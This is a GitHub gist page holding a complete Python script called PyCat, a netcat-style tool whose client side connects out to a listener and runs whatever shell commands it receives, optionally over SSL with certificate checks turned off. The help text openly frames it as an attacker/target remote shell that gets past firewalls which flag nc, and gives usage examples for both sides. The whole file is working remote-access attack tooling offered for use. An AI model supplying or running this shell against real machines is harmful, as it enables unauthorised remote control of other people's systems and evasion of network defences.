-
-
Save CalfCrusher/a0073eb17cf27e7be9ea7a25277d075a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import argparse | |
import datetime | |
from functools import wraps | |
import socket | |
from ssl import wrap_socket, create_default_context, CERT_NONE | |
import sys | |
import subprocess | |
import tempfile | |
import os | |
import re | |
from cryptography import x509 | |
from cryptography.x509.oid import NameOID | |
from cryptography.hazmat.primitives import serialization, hashes | |
from cryptography.hazmat.primitives.asymmetric import rsa | |
from cryptography.hazmat.backends import default_backend | |
SUCCESS_RESPONSE = b"Command successfully completed" | |
def ssl_server(func): | |
@wraps(func) | |
def wrapper(inst, *args): | |
inst.socket.bind((inst.host, inst.port)) | |
inst.socket.listen(0) | |
if inst.ssl: | |
inst.context = create_default_context() | |
inst.key, inst.cert = inst.generate_temp_cert() | |
inst.socket = wrap_socket( | |
inst.socket, | |
server_side=True, | |
certfile=inst.cert, | |
keyfile=inst.key | |
) | |
func(inst, *args) | |
return wrapper | |
def ssl_client(func): | |
@wraps(func) | |
def wrapper(inst, *args): | |
inst.socket.connect((inst.host, inst.port)) | |
if inst.ssl: | |
inst.context = create_default_context() | |
inst.context.check_hostname = False | |
inst.context.verify_mode = CERT_NONE | |
inst.socket = wrap_socket(inst.socket) | |
func(inst, *args) | |
return wrapper | |
class PyCatBase(): | |
def __init__(self, **kwargs): | |
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
self.port = kwargs['port'] | |
self.host = kwargs['host'] or "0.0.0.0" | |
self.timeout = kwargs['timeout'] | |
self.ssl = kwargs['ssl'] | |
self.is_windows = os.name == "nt" | |
self.change_dir_regex = re.compile(r'cd(?:\s+|$)(.*)') | |
def __enter__(self): | |
return self | |
def __exit__(self, *args): | |
self.socket.close() | |
return False | |
def exit(self): | |
self.socket.close() | |
sys.exit(0) | |
def read(self, connection, length=1024): | |
response = b"" | |
while True: | |
data = connection.recv(length) | |
response += data | |
if len(data) < length: | |
break | |
return response.decode("utf-8").rstrip() | |
@staticmethod | |
def generate_temp_cert(): | |
_, key_path = tempfile.mkstemp() | |
_, cert_path = tempfile.mkstemp() | |
name_attributes = [ | |
x509.NameAttribute(NameOID.COUNTRY_NAME, "OK"), | |
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "OK"), | |
x509.NameAttribute(NameOID.LOCALITY_NAME, "OK"), | |
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "OK"), | |
x509.NameAttribute(NameOID.COMMON_NAME, "PyCat") | |
] | |
key = rsa.generate_private_key( | |
public_exponent=65537, | |
key_size=2048, | |
backend=default_backend() | |
) | |
with open(key_path, "wb") as f: | |
f.write( | |
key.private_bytes( | |
encoding=serialization.Encoding.PEM, | |
format=serialization.PrivateFormat.TraditionalOpenSSL, | |
encryption_algorithm=serialization.NoEncryption() | |
) | |
) | |
subject = issuer = x509.Name(name_attributes) | |
cert = x509.CertificateBuilder()\ | |
.subject_name(subject)\ | |
.issuer_name(issuer)\ | |
.public_key(key.public_key())\ | |
.serial_number(x509.random_serial_number())\ | |
.not_valid_before(datetime.datetime.utcnow())\ | |
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365)) | |
cert = cert.sign(key, hashes.SHA256(), default_backend()) | |
with open(cert_path, "wb") as f: | |
f.write( | |
cert.public_bytes(serialization.Encoding.PEM) | |
) | |
return key_path, cert_path | |
class PyCatServer(PyCatBase): | |
def __init__(self, **kwargs): | |
super(PyCatServer, self).__init__(**kwargs) | |
def create_prompt_string(self): | |
self.client.send(b"cd") if self.is_windows else self.client.send(b"pwd") | |
pwd = self.read(self.client) | |
self.client.send(b"whoami") | |
whoami = self.read(self.client) | |
self.client.send(b"hostname") | |
hostname = self.read(self.client) | |
return f"{whoami}@{hostname} PyCat {pwd}\n$ " | |
@ssl_server | |
def main(self): | |
if self.timeout > 0: | |
self.socket.settimeout(self.timeout) | |
self.client, addr = self.socket.accept() | |
print(f"[*] Incomming connection from {':'.join(map(str, addr))}") | |
self.handle_client() | |
def handle_client(self): | |
while True: | |
prompt_string = self.create_prompt_string() | |
command = input(prompt_string) | |
self.client.send(command.encode("utf-8")) | |
if command == "exit": | |
break | |
print(self.read(self.client)) | |
self.exit() | |
class PyCatClient(PyCatBase): | |
def __init__(self, **kwargs): | |
super(PyCatClient, self).__init__(**kwargs) | |
def change_dir(self, path): | |
try: | |
os.chdir(path) | |
return SUCCESS_RESPONSE | |
except FileNotFoundError as e: | |
return str(e).encode("utf-8") | |
def exec_command(self, command): | |
try: | |
return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True) | |
except Exception as e: | |
return str(e).encode("utf-8") | |
def handle_command(self, command): | |
if command == "exit": | |
self.exit() | |
change_dir = re.match(self.change_dir_regex, command) | |
if change_dir and change_dir.group(1): | |
return self.change_dir(change_dir.group(1)) | |
return self.exec_command(command) | |
@ssl_client | |
def main(self): | |
if self.timeout > 0: | |
self.socket.settimeout(self.timeout) | |
while True: | |
cmd = self.read(self.socket) | |
response = self.handle_command(cmd) | |
if len(response) > 0: | |
self.socket.send(response) | |
def parse_arguments(): | |
parser = argparse.ArgumentParser(usage='%(prog)s [options]', | |
description='PyCat by @Ludisposed', | |
formatter_class=argparse.RawDescriptionHelpFormatter, | |
epilog=r''' | |
This is a tiny implementation of nc in Python3.6+ | |
nc is often flagged by firewalls... | |
but now you can (really) teach your colleagues to lock their workstations! >:) | |
Features | |
- SSL encryption | |
- Multi platform | |
- Persistent shell | |
PyCat Commands | |
- exit | |
- cd {path} | |
- (TODO upload/download files) | |
Examples: | |
[Encrypted shell] | |
./pycat.py -lsp 443 [@Attacker] | |
./pycat.py -si localhost -p 443 [@Target] | |
[Not Encrypted shell] | |
./pycat.py -lp 8080 [@Attacker] | |
./pycat.py -i localhost -p 8080 [@Target] | |
Example output | |
$ ./pycat.py -lsp 443 | |
[*] Incomming connection from 127.0.0.1:62135 | |
username@hostname PyCat C:\PyCat\ | |
$ echo hooooi | |
hooooi | |
$ cd ../ | |
Command successfully completed | |
username@hostname PyCat C:\ | |
$ exit | |
''') | |
parser.add_argument('-l', '--listen', action="store_true", help='Spawns server, and listens for incomming connections') | |
parser.add_argument('-s', '--ssl', action="store_true", help='Encrypt connection with SSL') | |
parser.add_argument('-p', '--port', type=int, help='Port to listen/connect on') | |
parser.add_argument('-i', '--host', type=str, help='Host to connect to') | |
parser.add_argument('-t', '--timeout', type=int, default=0, help='Add timeout in seconds') | |
args = parser.parse_args() | |
if (args.listen or args.host) and not args.port: | |
parser.error('Specify which port to connect to') | |
elif not args.listen and not args.host: | |
parser.error('Specify --listen or --host') | |
return args | |
if __name__ == '__main__': | |
args = parse_arguments() | |
pycat_class = PyCatServer if args.listen else PyCatClient | |
pycat = pycat_class(**vars(args)) | |
with pycat: # Usable with context | |
pycat.main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment